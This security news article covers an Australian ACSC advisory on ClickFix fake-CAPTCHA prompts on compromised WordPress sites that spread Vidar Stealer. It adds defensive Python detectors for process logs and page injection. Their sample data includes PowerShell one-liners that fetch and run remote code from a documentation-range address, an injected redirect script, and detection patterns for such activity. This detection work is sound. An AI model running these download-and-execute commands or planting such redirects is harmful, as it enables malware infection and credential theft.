
Australia Warns of ClickFix Malware Attacks Spreading Vidar Stealer


“The Australian Signals Directorate’s Australian Cyber Security Center (ASD's ACSC) has observed ClickFix-associated activity leveraging WordPress-hosted infrastructure to distribute the Vidar Stealer malware,” the agency warned in its advisory.

ClickFix social engineering technique

ClickFix is a social engineering technique that relies on deceiving users into executing commands themselves. In the campaign described by the Australian Cyber Security Center (ACSC), compromised or malicious websites present visitors with fake CAPTCHA or browser verification prompts. The prompts instruct the user to copy a PowerShell command and run it manually. Because the command is launched by the victim, in the victim's own session and through a built-in interpreter rather than a downloaded file, it sidesteps controls that key on attachments and downloads, and the attacker uses it to deliver malware, most often information stealers.

Compromised WordPress sites and fake Cloudflare prompts

According to the ACSC advisory, attackers are using WordPress-hosted infrastructure as the initial distribution point. Compromised WordPress websites redirect visitors to pages that display what appears to be a legitimate Cloudflare verification or CAPTCHA prompt. The prompt tells the user to copy a PowerShell command and execute it on their system; following that instruction leads to a Vidar Stealer infection.

Vidar Stealer: capabilities, delivery and evasions

Vidar Stealer is an information-stealing malware family and a malware-as-a-service (MaaS) operation that first appeared in late 2018. The ACSC notes several characteristics that explain its continued appeal to cybercriminals: it is relatively inexpensive to use, simple to deploy, and capable of collecting a broad range of data. Observed targets include browser passwords, cookies, cryptocurrency wallets, autofill information and system details.

Operationally, Vidar reduces its forensic footprint by deleting its executable after launch and running from memory. To resolve its command-and-control servers it has been observed to use "dead-drop" URLs hosted on public services such as Telegram bots and Steam profiles, which lets the operator change the C2 address without changing the sample. The advisory also states that Vidar has been promoted through multiple lures and channels, among them purported Windows fixes, TikTok videos and GitHub, and that the developer released a new version with upgraded capabilities last year.

ACSC mitigation advice and available indicators

The ACSC recommends concrete defensive measures aimed at the specific mechanics of ClickFix and Vidar. For organizations, the agency advises restricting PowerShell execution and implementing application allow-listing to reduce the risk from attacks that rely on user-run commands and on living-off-the-land execution. For WordPress site administrators, the ACSC specifically recommends applying available security updates for themes and add-ons and removing any unused themes or plugins from their platforms.

The ACSC bulletin also provides indicators of compromise (IoCs) to allow organizations and defenders to detect intrusions or to tune controls against the observed activity.
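The control point the ACSC describes, an interpreter launched by the user to run a command pasted from a web page, leaves a distinctive process-creation record. The following is an added example, not code from the advisory or any ACSC tooling, that scores such records for ClickFix tradecraft: an interpreter spawned from explorer.exe (where a Run-dialog command lands), hidden-window and no-profile switches, a remote fetch piped into Invoke-Expression, and base64 -EncodedCommand arguments, which it decodes before matching. The sample events, the 203.0.113.5 address, the CcmExec parent and the severity thresholds are constructed for the example and are not the advisory's indicators.

```python
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Interpreters a ClickFix prompt asks the victim to paste into, and the parents that mean a
# human launched them interactively (the Run dialog and the Explorer address bar spawn
# children from explorer.exe; a command pasted into a terminal comes from WindowsTerminal.exe).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell's own encoding).
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "remote_fetch": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I),
    "inline_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "encoded_command": ENCODED_ARG,
}


def encode_ps(command: str) -> str:
    """Produce the argument PowerShell expects after -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext of an -EncodedCommand argument so indicators match on it too."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    user: str
    image: str
    parent: str
    indicators: list
    decoded: Optional[str]
    severity: str


def analyse_event(event: dict) -> Optional[Finding]:
    """Score one process-creation record; return a Finding, or None if it looks routine."""
    image = basename(event["Image"])
    if image not in INTERPRETERS:
        return None
    parent = basename(event["ParentImage"])
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A human-launched interpreter that fetches from the network or evaluates a string is the
    # ClickFix shape; two or more tradecraft switches from any parent still deserve a look.
    if parent in INTERACTIVE_PARENTS and {"remote_fetch", "inline_eval"} & set(hits):
        severity = "high"
    elif len(hits) >= 2:
        severity = "medium"
    else:
        return None
    return Finding(event["User"], image, parent, hits, decoded, severity)


def hunt(events) -> list:
    return [f for f in (analyse_event(e) for e in events) if f is not None]


# Constructed sample records (Sysmon Event ID 1 / Security 4688 fields). 203.0.113.0/24 is a
# documentation range; none of this is taken from the ACSC indicator list.
SAMPLE_EVENTS = [
    {"User": r"CORP\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iwr http://203.0.113.5/verify.txt | iex"'},
    {"User": r"CORP\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -EncodedCommand " + encode_ps("irm http://203.0.113.5/a | iex")},
    {"User": r"NT AUTHORITY\SYSTEM", "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f.severity, f.user, f.parent, "->", f.image, f.indicators, f.decoded)
```

Run the same scoring over exported Sysmon Event ID 1 or Security 4688 records, and add the ACSC-published IoCs as a further match on the URL and host fields. The parent-process test is what separates a pasted command from the scheduled and management-tool PowerShell that most fleets run all day, which is why the management-agent sample scores nothing.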

What this means for technologists, WordPress administrators, and end users

  • Technologists and security teams: Treat PowerShell usage and process execution as a control point—restricting PowerShell execution and using application allow-listing are the ACSC’s recommended countermeasures. Use the ACSC-provided IoCs to hunt for signs of compromise and to instrument detection rules.
  • WordPress administrators: Prioritize patching of themes and plugins, remove unused extensions, and monitor for unexpected redirects that could lead to fake verification prompts; the advisory ties compromised WordPress-hosted infrastructure directly to the distribution chain.
  • End users and general staff: Be wary of any website that asks you to copy-and-paste a command into a terminal or PowerShell window—ClickFix-style prompts often masquerade as Cloudflare or CAPTCHA verifications and rely on users executing commands themselves.
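For the WordPress administrator item above, the practical check is to look at what a page actually serves to visitors: an unexpected off-site script, a meta refresh or JavaScript redirect to another host, or text walking the visitor through pasting a command. The following is an added example, not code from the advisory or from WordPress, that scans fetched HTML for those three things with the standard-library parser. The site host, the script allow-list, the .invalid domains and the three sample pages are constructed for the example; the instruction-text pattern is a triage heuristic and will also flag a legitimate tutorial that mentions PowerShell.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical site under review and the script hosts its administrator expects to see.
SITE_HOST = "example.com"
ALLOWED_SCRIPT_HOSTS = {SITE_HOST, "cdnjs.cloudflare.com"}

JS_REDIRECT = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['\"](https?://[^'\"]+)", re.I)
META_REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.I)
# Wording a fake verification page uses to walk the visitor through running a command.
PASTE_INSTRUCTION = re.compile(
    r"win\s*\+\s*r|run\s+dialog|ctrl\s*\+\s*v|paste\s+(?:it|the\s+command)|powershell", re.I)


def offsite(url: str) -> bool:
    """True when an absolute URL points at a host other than the site itself."""
    host = urlparse(url).hostname
    return host is not None and host != SITE_HOST


class PageScanner(HTMLParser):
    """Collects (kind, detail) findings while walking one HTML document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            src = a.get("src")
            # Relative src means the site itself; anything else must be on the allow-list.
            if src and (urlparse(src).hostname or SITE_HOST) not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append(("external_script", src))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH_URL.search(a.get("content") or "")
            if m and offsite(m.group(1)):
                self.findings.append(("meta_refresh", m.group(1)))
        elif tag == "iframe" and a.get("src") and offsite(a["src"]):
            self.findings.append(("offsite_iframe", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.findings.extend(("js_redirect", u) for u in JS_REDIRECT.findall(data) if offsite(u))
        elif PASTE_INSTRUCTION.search(data):
            self.findings.append(("paste_instruction", " ".join(data.split())[:80]))


def scan_page(html: str) -> list:
    scanner = PageScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed pages: a clean front page, the same page with an injected redirect chain, and a
# landing page of the kind visitors are sent to. The .invalid domains are reserved placeholders.
CLEAN_PAGE = """<!doctype html><html><head><title>Acme Blog</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body><h1>Welcome</h1><p>News and updates from the Acme team.</p></body></html>"""

INJECTED_PAGE = """<!doctype html><html><head><title>Acme Blog</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.invalid/check.js"></script>
<meta http-equiv="refresh" content="0;url=https://verify.invalid/captcha">
<script>if (document.referrer) { window.location.href = 'https://verify.invalid/captcha'; }</script>
</head><body><h1>Welcome</h1></body></html>"""

LANDING_PAGE = """<html><body><h2>Verify you are human</h2>
<p>Press Win + R, paste the command with Ctrl + V and press Enter to continue.</p></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE), ("landing", LANDING_PAGE)):
        print(name, scan_page(page))
```

Fetch the pages with a browser-like User-Agent and a referrer set, since injected redirectors often serve the clean page to crawlers and to direct visits; compare the result against a copy of the theme and plugin files from a known-good release to locate where the script was inserted.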

The ACSC advisory sketches a straightforward but potent attack chain: compromised WordPress pages lead to fake verification prompts; social engineering convinces users to run PowerShell; Vidar executes from memory and reaches out for C2 via public dead-drops. The tools and tradecraft are not exotic, but they are effective—so the practical steps the ACSC recommends (restricting PowerShell, allow-listing, WordPress hygiene, and use of IoCs) are equally direct. Defenders who act on those specifics can close the narrow window that ClickFix exploits.
